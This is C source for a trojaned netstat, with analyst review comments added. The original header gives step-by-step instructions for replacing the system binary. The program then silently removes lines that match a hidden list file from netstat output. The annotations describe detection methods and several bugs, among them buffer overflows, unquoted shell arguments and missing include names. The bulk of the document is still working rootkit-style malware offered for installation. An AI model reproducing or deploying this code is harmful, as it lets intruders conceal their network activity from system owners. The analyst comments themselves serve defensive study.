/* * Universal Netstat Trojan Beta version * * !!! EDUCATIONAL PURPOSE ONLY !!! * * CONFIDENTIAL - SOURCE MATERIALS * * You are not allowed to reproduce this software without Author * security's team permissions. ***************************************************************************** * * (C) COPYRIGHT Security * All Rights Reserved * ***************************************************************************** * * IDEA by Angelo Rosiello (Guilecool) * * CODED by Guilecool and eXedes * * FRIENDS DiGiT by ADM, dekadish and anakata * * LAMERS MrHarley and all #mrharley ppl, euge, [LuNa] * * HOW TO USE ? * * 1) #define LISTOFITEMS "/tmp/.sysproc" * Put here the strings yout to be hidden, you must create it by your self! * * 2) #define TMPOUTFILE "/tmp/.tmp" * If you wish u can change the TMPOUTFILE but it's not needed. * * Compile the file * Move the real /bin/netstat in /usr/bin/netstat * Put netstatx in /bin * For example : * #gcc netstatx.c -o netstatx * #mv /bin/netstat /usr/bin/netstat * #mv netstatx /bin/netstat * * There you go! * * Good bye ;> * * DO Not Hack, that's stupid ;> * * PS: Italian---> * L'autore si manleva da ogni responsabilità circa l'uso che terzi possono fare * del programma in questione. Il programma nasce come esempio di strumento atto * a nascondere delle stringhe dallo Standard Output. 
* ADVICE: Do not hack, it is stupid :> */

// NOTE(review): the header names after the ten #include directives are missing
// from this copy (presumably stripped as markup during extraction), so the
// listing does not compile as shown.
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

// Analyst summary, taken from the code below: this program stands in for
// netstat. It runs the relocated original at /usr/bin/netstat through system(),
// captures that output in TMPOUTFILE, and prints every line except those that
// contain a string listed in LISTOFITEMS.
// Host artefacts visible in this listing: the two /tmp paths defined below, the
// hard-coded /usr/bin/netstat path, and a shell child process on every run.
// Checking /bin/netstat against the distribution's package database and
// comparing its output with an independent source such as /proc/net/tcp are
// the usual ways to confirm or rule out a wrapper of this kind.

#define READBUFFERLEN 512
#define LISTOFITEMS "/tmp/.sysproc" // file holding the strings to suppress from the output; read by LoadHideList()
#define TMPOUTFILE "/tmp/.tmp" // fixed, predictable path that receives the real netstat output
#define new(p) ( p * )malloc(sizeof ( p )) // allocation shorthand; the result is never checked for NULL

unsigned char filter (char *big , char *lil ) ;

// Singly linked list of the strings to hide.
struct ItemList
{
    char *item ;            // one string to suppress
    struct ItemList *next ; // next entry, NULL at the end of the list
} ;

// Adds a string to the front of the list.
// Returns 0 on error (str is NULL),
// 1 otherwise.
unsigned char AddItemToHide (struct ItemList **p, char *str)
{
    struct ItemList *ptr ;
    unsigned int len ;
    if (!str) return 0 ;
    ptr = new ( struct ItemList ) ;
    ptr->next = *p ;
    len = strlen(str) ;
    // NOTE(review): only len-1 bytes are allocated and copied, so the stored
    // entry is the input minus its last character and carries no terminating
    // NUL; strcmp()/strstr() on it read past the allocation. For an empty
    // string, len-1 wraps around because len is unsigned.
    ptr->item = (char *) malloc (len-1) ;
    strncpy(ptr->item,str,len-1);
    *p = ptr ;
    return 1 ;
}

// List destructor: walks the list recursively and frees the nodes.
// NOTE(review): item is freed only for nodes that have a successor, so the
// last node's string is never released.
void Destroy (struct ItemList **p)
{
    if (!(*p)) return ;
    if ((*p)->next)
    {
        free((*p)->item) ;
        Destroy(&((*p)->next)) ;
    }
    free (*p) ;
}

// Finds an item in the list by exact strcmp() match; returns 1 if found,
// 0 otherwise. The author notes it is not needed for now, and nothing in this
// listing calls it.
unsigned int FindItem ( struct ItemList *p , char *item )
{
    struct ItemList *ptr ;
    int len ; // unused
    if ( !p || !item ) return 0 ;
    ptr = p ;
    while (ptr)
    {
        if ( !strcmp(item,ptr->item) ) return 1 ;
        ptr = ptr->next ;
    }
    return 0 ;
}

// Loads the content of the file at path into the list pointed to by p,
// one whitespace-delimited token per entry.
// Returns the loop count on success, 0 if the file cannot be opened.
unsigned long LoadHideList (char *path, struct ItemList **p )
{
    FILE *fp ;
    char buffer[READBUFFERLEN] ;
    unsigned long count = 0 ;
    fp = fopen (path,"r") ;
    // if the file is not found
    if ( !fp )
    {
        // This message goes to stdout, so a missing list file shows up in the
        // output the user sees.
        printf ("*file not found* : %s\n",path ) ;
        return 0 ;
    }
    while ( !feof ( fp ) )
    {
        // count is incremented once per pass, before the read, so it counts
        // read attempts rather than entries actually added.
        ++count ;
        // NOTE(review): %s has no field width, so a token longer than
        // READBUFFERLEN-1 bytes writes past buffer; the return value is not
        // checked, so a failed read reuses whatever buffer already holds.
        fscanf(fp,"%s",buffer );
        if ( !isspace ( *buffer ) )
            AddItemToHide( p , buffer ) ;
    }
    fclose(fp) ;
    if ( !count ) return 0 ;
    else return count ;
}

// Returns 1 if the first occurrence of lil in big stands as a whole word:
// followed by newline, space or end of string, and either at the start of big
// or preceded by a space. Returns 0 otherwise, including for NULL arguments.
// Not used here: main() matches with plain strstr() instead.
unsigned char filter (char *big , char *lil )
{
    char *ptr ; // pointer to the first occurrence
    char end ;
    char begin ;
    unsigned char rc ;
    if ( !big || ! lil ) return 0 ;
    ptr = strstr(big,lil) ;
    if ( !ptr ) rc = 0 ;
    else
    {
        // if it is the last one on the line
        end = *(ptr+strlen(lil)) ;
        if ( end == '\n' || end == 0x20 || end == 0)
        {
            if ( ptr != big )
            {
                begin = *( ptr - 1 ) ;
                if ( begin == 0x20 ) rc = 1 ;
                else rc = 0 ;
            }
            else rc = 1 ;
        }
        else rc = 0 ;
    }
    return rc ;
}

// Entry point: runs the real netstat with the caller's arguments, then prints
// its output minus every line that contains a listed string.
int main (int argc, char **argv)
{
    pid_t pid ;
    int i ;
    int len=0 ;
    int c ;
    int size ;
    FILE *fp ;
    char *strcmd ;
    char buffer[READBUFFERLEN] ;
    unsigned char found ;
    struct ItemList *ItemsToHide = NULL ;
    struct ItemList *ptr = NULL ;
    // Rebuild the argument list:
    // collect the total size of the command string
    for ( i = 1 ;i < argc ; i ++ )
        len += strlen( argv[i] ) + 1 ;
    len += strlen ( "/usr/bin/netstat " );
    // and create it here
    size = ( len + 4 + strlen(TMPOUTFILE) ) * sizeof(char) ;
    strcmd = ( char * ) malloc ( size ) ;
    // NOTE(review): strcat() appends to memory that malloc() left
    // uninitialised, so where the command text lands is undefined.
    strcat ( strcmd , "/usr/bin/netstat " );
    // Arguments are appended with no separator between them and reach the
    // shell unquoted, so a multi-argument invocation does not behave like the
    // real tool and shell metacharacters in arguments are interpreted.
    for ( i = 1 ; i < argc ; i ++ )
        strcat(strcmd,argv[i]);
    strcat ( strcmd , " > " ) ;
    strcat ( strcmd , TMPOUTFILE ) ;
    // The command is executed twice; each system() call starts a shell, which
    // process-creation telemetry would record as a child of this binary.
    system ( strcmd );
    c = system ( strcmd );
    if ( c<0 )
    {
        system ( "rm /tmp/.tmp" );
        return; // NOTE(review): no value returned from int main
    }
    // load the items to hide
    LoadHideList (LISTOFITEMS,&ItemsToHide) ;
    fp = fopen ( TMPOUTFILE , "r" ) ;
    if (!fp) exit(0);
    while (!feof(fp))
    {
        ptr = ItemsToHide ;
        // fgets() is not checked: after the final failed read the buffer still
        // holds the previous line, which can then be processed a second time.
        fgets ( buffer , READBUFFERLEN , fp );
        // A line is dropped when any listed string occurs anywhere in it
        // (substring match, not whole-word).
        for ( found = 0 ; ptr ; ptr = ptr -> next )
            if ( strstr ( buffer , ptr->item) )
            {
                found = 1 ;
                break ;
            }
        if ( ! found )
            printf ( "%s",buffer ) ;
    }
    fclose (fp) ;
    // The cleanup path is hard-coded rather than taken from TMPOUTFILE, so the
    // two diverge if the define is changed.
    system ( "rm /tmp/.tmp" );
    free ( strcmd ) ;
    if ( ItemsToHide ) Destroy(&ItemsToHide) ;
}